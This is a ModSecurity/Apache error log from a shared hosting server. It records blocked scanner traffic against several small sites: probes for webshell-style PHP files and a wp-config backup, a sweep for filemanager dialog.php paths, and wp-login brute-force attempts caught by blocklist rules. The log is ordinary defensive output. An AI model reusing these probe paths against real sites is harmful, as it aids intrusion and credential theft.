[Tue May 26 20:01:30.465651 2026] [security2:error] [pid 106517:tid 106721] [client 103.163.220.34:37383] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/languages/autoload_classmap.php"] [unique_id "ahWuwoZZc2DoU1lPnP1xdwAAAMs"]
[Tue May 26 20:01:30.648616 2026] [security2:error] [pid 106517:tid 106726] [client 178.238.226.119:59177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/app/filemanager/dialog.php"] [unique_id "ahWuwoZZc2DoU1lPnP1xfwAAANA"]
[Tue May 26 20:01:31.010464 2026] [security2:error] [pid 106517:tid 106692] [client 103.163.220.33:41837] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/block-supports/chosen.php"] [unique_id "ahWuw4ZZc2DoU1lPnP1xlAAAAK4"]
[Tue May 26 20:01:31.249107 2026] [security2:error] [pid 106517:tid 106662] [client 151.245.177.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuw4ZZc2DoU1lPnP1xmQAAAJE"], referer: https://anujtradingco.com
[Tue May 26 20:01:31.375930 2026] [security2:error] [pid 113091:tid 113224] [client 178.238.226.119:61879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/backup/filemanager/dialog.php"] [unique_id "ahWuw6PxBGSmlFNOy6pCNQAAAhc"]
[Tue May 26 20:01:31.492741 2026] [security2:error] [pid 106517:tid 106670] [client 103.163.220.32:54201] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/group/"] [unique_id "ahWuw4ZZc2DoU1lPnP1xowAAAJk"]
[Tue May 26 20:01:31.922663 2026] [security2:error] [pid 106517:tid 106718] [client 178.238.226.119:62675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/bower_components/filemanager/dialog.php"] [unique_id "ahWuw4ZZc2DoU1lPnP1xuAAAAMg"]
[Tue May 26 20:01:31.989243 2026] [security2:error] [pid 106517:tid 106759] [client 103.163.220.25:36663] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Text/Diff/Engine/template-singl-portfolio.php"] [unique_id "ahWuw4ZZc2DoU1lPnP1xvwAAAPE"]
[Tue May 26 20:01:32.258825 2026] [security2:error] [pid 106517:tid 106685] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuw4ZZc2DoU1lPnP1xtQAAAKc"]
[Tue May 26 20:01:32.479742 2026] [security2:error] [pid 106517:tid 106761] [client 103.163.220.54:48463] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/media-text/"] [unique_id "ahWuxIZZc2DoU1lPnP1x0wAAAPM"]
[Tue May 26 20:01:32.502552 2026] [security2:error] [pid 113091:tid 113304] [client 178.238.226.119:63445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/bower_components/plugins/filemanager/dialog.php"] [unique_id "ahWuxKPxBGSmlFNOy6pCPAAAAmc"]
[Tue May 26 20:01:32.700069 2026] [security2:error] [pid 106517:tid 106645] [remote 103.95.119.103:58868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWuxIZZc2DoU1lPnP1x1AAAoH0"]
[Tue May 26 20:01:32.971965 2026] [security2:error] [pid 106517:tid 106766] [client 103.163.220.44:53063] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/we.php"] [unique_id "ahWuxIZZc2DoU1lPnP1x5AAAAPg"]
[Tue May 26 20:01:33.017545 2026] [security2:error] [pid 106517:tid 106602] [remote 103.95.119.103:58868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWuxIZZc2DoU1lPnP1x4wAAylI"], referer: https://filosha.com/wp-login.php
[Tue May 26 20:01:33.097973 2026] [security2:error] [pid 106517:tid 106710] [client 178.238.226.119:64088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/backend/filemanager/dialog.php"] [unique_id "ahWuxYZZc2DoU1lPnP1x5gAAAMA"]
[Tue May 26 20:01:33.458506 2026] [security2:error] [pid 106517:tid 106770] [client 103.163.220.23:24915] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/sunrise/"] [unique_id "ahWuxYZZc2DoU1lPnP1x8wAAAPw"]
[Tue May 26 20:01:33.583020 2026] [security2:error] [pid 106517:tid 106753] [client 178.238.226.119:64620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/blog/filemanager/dialog.php"] [unique_id "ahWuxYZZc2DoU1lPnP1x-QAAAOs"]
[Tue May 26 20:01:33.968691 2026] [security2:error] [pid 106517:tid 106727] [client 103.163.220.36:38493] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/files.php"] [unique_id "ahWuxYZZc2DoU1lPnP1yDQAAANE"]
[Tue May 26 20:01:34.162655 2026] [security2:error] [pid 106517:tid 106674] [client 178.238.226.119:65270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/core/filemanager/dialog.php"] [unique_id "ahWuxoZZc2DoU1lPnP1yFQAAAJ0"]
[Tue May 26 20:01:34.479145 2026] [security2:error] [pid 113091:tid 113248] [client 103.163.220.46:57547] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentynineteen/sass/site/"] [unique_id "ahWuxqPxBGSmlFNOy6pCVAAAAi8"]
[Tue May 26 20:01:34.751405 2026] [security2:error] [pid 106517:tid 106677] [client 178.238.226.119:49914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/cms/filemanager/dialog.php"] [unique_id "ahWuxoZZc2DoU1lPnP1yKwAAAKA"]
[Tue May 26 20:01:34.980915 2026] [security2:error] [pid 113091:tid 113253] [client 103.163.220.35:32327] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wmore1.php"] [unique_id "ahWuxqPxBGSmlFNOy6pCWAAAAjQ"]
[Tue May 26 20:01:35.367957 2026] [security2:error] [pid 106517:tid 106738] [client 178.238.226.119:50972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/cms/ckeditor/filemanager/dialog.php"] [unique_id "ahWux4ZZc2DoU1lPnP1yRwAAANw"]
[Tue May 26 20:01:35.481492 2026] [security2:error] [pid 106517:tid 106776] [client 103.163.220.41:23319] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sodium_compat/namespaced/Core/"] [unique_id "ahWux4ZZc2DoU1lPnP1ySwAAAQI"]
[Tue May 26 20:01:35.497727 2026] [security2:error] [pid 106517:tid 106561] [remote 18.190.7.192:49098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWux4ZZc2DoU1lPnP1yRQAA6Ck"]
[Tue May 26 20:01:35.909178 2026] [security2:error] [pid 106517:tid 106717] [client 178.238.226.119:54148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/cms/plugins/filemanager/dialog.php"] [unique_id "ahWux4ZZc2DoU1lPnP1yYAAAAMc"]
[Tue May 26 20:01:36.161518 2026] [security2:error] [pid 106517:tid 106772] [client 103.163.220.13:44255] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/SimplePie/src/Content/Type/"] [unique_id "ahWuyIZZc2DoU1lPnP1yaAAAAP4"]
[Tue May 26 20:01:36.435492 2026] [security2:error] [pid 113091:tid 113211] [remote 5.42.158.148:40260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuyKPxBGSmlFNOy6pCYgACRXc"]
[Tue May 26 20:01:36.507951 2026] [security2:error] [pid 106517:tid 106692] [client 178.238.226.119:59806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/cms/js/filemanager/dialog.php"] [unique_id "ahWuyIZZc2DoU1lPnP1ycwAAAK4"]
[Tue May 26 20:01:36.661711 2026] [security2:error] [pid 106517:tid 106660] [client 103.163.220.16:41223] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentyfour/assets/"] [unique_id "ahWuyIZZc2DoU1lPnP1yfAAAAI8"]
[Tue May 26 20:01:37.112348 2026] [security2:error] [pid 112029:tid 112243] [client 74.7.175.141:60492] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.masonicarkfoundation.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWuyaFW0C-ajaCsyFc_IQABXhs"]
[Tue May 26 20:01:37.190910 2026] [security2:error] [pid 112029:tid 112276] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuyKFW0C-ajaCsyFc_HQAAAX8"]
[Tue May 26 20:01:37.192071 2026] [security2:error] [pid 106517:tid 106766] [client 103.163.220.45:37905] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/file.php"] [unique_id "ahWuyYZZc2DoU1lPnP1ykgAAAPg"]
[Tue May 26 20:01:37.218688 2026] [security2:error] [pid 106517:tid 106684] [client 178.238.226.119:62796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/cms/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWuyYZZc2DoU1lPnP1ylgAAAKY"]
[Tue May 26 20:01:37.300597 2026] [autoindex:error] [pid 106517:tid 106726] [client 43.164.190.124:36088] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:01:37.501371 2026] [autoindex:error] [pid 106517:tid 106617] [remote 74.7.241.34:37198] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:01:37.679564 2026] [security2:error] [pid 112029:tid 112242] [client 103.163.220.30:36893] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sodium_compat/src/Core/"] [unique_id "ahWuyaFW0C-ajaCsyFc_KQAAAV0"]
[Tue May 26 20:01:38.168553 2026] [security2:error] [pid 113091:tid 113303] [client 103.163.220.16:40807] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Requests/library/"] [unique_id "ahWuyqPxBGSmlFNOy6pCdwAAAmY"]
[Tue May 26 20:01:38.397908 2026] [security2:error] [pid 112029:tid 112273] [client 178.238.226.119:64617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/dev/filemanager/dialog.php"] [unique_id "ahWuyqFW0C-ajaCsyFc_LgAAAXw"]
[Tue May 26 20:01:38.621853 2026] [security2:error] [pid 106517:tid 106633] [remote 18.190.7.192:49098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWuyoZZc2DoU1lPnP1yvgAAz3E"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 20:01:38.676049 2026] [security2:error] [pid 113091:tid 113313] [client 103.163.220.53:32021] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/l10n/"] [unique_id "ahWuyqPxBGSmlFNOy6pCgQAAAnA"]
[Tue May 26 20:01:38.842504 2026] [security2:error] [pid 106517:tid 106660] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuyoZZc2DoU1lPnP1yvAAAAI8"]
[Tue May 26 20:01:38.941665 2026] [security2:error] [pid 106517:tid 106777] [client 178.238.226.119:65328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/editor/filemanager/dialog.php"] [unique_id "ahWuyoZZc2DoU1lPnP1y2AAAAQM"]
[Tue May 26 20:01:39.182464 2026] [security2:error] [pid 106517:tid 106721] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuyoZZc2DoU1lPnP1yywAAAMs"]
[Tue May 26 20:01:39.194194 2026] [security2:error] [pid 113091:tid 113234] [client 103.163.220.32:65467] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/themes/"] [unique_id "ahWuy6PxBGSmlFNOy6pChwAAAiE"]
[Tue May 26 20:01:39.418855 2026] [security2:error] [pid 113091:tid 113337] [client 223.109.255.206:33129] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahWuy6PxBGSmlFNOy6pCigAAAog"], referer: http://pic.sogou.com
[Tue May 26 20:01:39.526846 2026] [security2:error] [pid 106517:tid 106742] [client 178.238.226.119:50085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/include/filemanager/dialog.php"] [unique_id "ahWuy4ZZc2DoU1lPnP1y5wAAAOA"]
[Tue May 26 20:01:39.759528 2026] [security2:error] [pid 112029:tid 112223] [client 103.163.220.43:60503] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/PHPMailer/widgets/"] [unique_id "ahWuy6FW0C-ajaCsyFc_OAAAAUo"]
[Tue May 26 20:01:40.044245 2026] [security2:error] [pid 112029:tid 112168] [client 178.238.226.119:51198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/include/ckeditor/filemanager/dialog.php"] [unique_id "ahWuzKFW0C-ajaCsyFc_PQAAARM"]
[Tue May 26 20:01:40.271715 2026] [security2:error] [pid 106517:tid 106757] [client 103.163.220.27:47301] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/radio.php"] [unique_id "ahWuzIZZc2DoU1lPnP1y-QAAAO8"]
[Tue May 26 20:01:40.610986 2026] [security2:error] [pid 113091:tid 113344] [client 178.238.226.119:51911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/include/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWuzKPxBGSmlFNOy6pClwAAAo8"]
[Tue May 26 20:01:40.775456 2026] [security2:error] [pid 106517:tid 106768] [client 103.163.220.32:21647] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/wp-config-backup.php"] [unique_id "ahWuzIZZc2DoU1lPnP1zDwAAAPo"]
[Tue May 26 20:01:41.193803 2026] [security2:error] [pid 106517:tid 106662] [client 178.238.226.119:52526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/include/js/filemanager/dialog.php"] [unique_id "ahWuzYZZc2DoU1lPnP1zIgAAAJE"]
[Tue May 26 20:01:41.270970 2026] [security2:error] [pid 113091:tid 113270] [client 103.163.220.10:60743] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Requests/src/Exception/"] [unique_id "ahWuzaPxBGSmlFNOy6pCoAAAAkU"]
[Tue May 26 20:01:41.764261 2026] [security2:error] [pid 106517:tid 106705] [client 103.163.220.11:62851] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/vx.php"] [unique_id "ahWuzYZZc2DoU1lPnP1zMwAAALs"]
[Tue May 26 20:01:41.783210 2026] [security2:error] [pid 113091:tid 113296] [client 178.238.226.119:53248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/includes/filemanager/dialog.php"] [unique_id "ahWuzaPxBGSmlFNOy6pCtQAAAl8"]
[Tue May 26 20:01:42.060964 2026] [security2:error] [pid 113091:tid 113315] [client 203.192.213.90:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuzaPxBGSmlFNOy6pCrQAAAnI"]
[Tue May 26 20:01:42.268054 2026] [security2:error] [pid 113091:tid 113279] [client 103.163.220.14:39391] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/certificates/autoload_classmap.php"] [unique_id "ahWuzqPxBGSmlFNOy6pCuAAAAk4"]
[Tue May 26 20:01:42.454747 2026] [security2:error] [pid 106517:tid 106691] [client 178.238.226.119:54073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/includes/ckeditor/filemanager/dialog.php"] [unique_id "ahWuzoZZc2DoU1lPnP1zSgAAAK0"]
[Tue May 26 20:01:42.776684 2026] [security2:error] [pid 113091:tid 113300] [client 103.163.220.17:33955] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/theme/about.php"] [unique_id "ahWuzqPxBGSmlFNOy6pCwAAAAmM"]
[Tue May 26 20:01:43.022232 2026] [security2:error] [pid 106517:tid 106735] [client 178.238.226.119:54717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/includes/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWuz4ZZc2DoU1lPnP1zVwAAANk"]
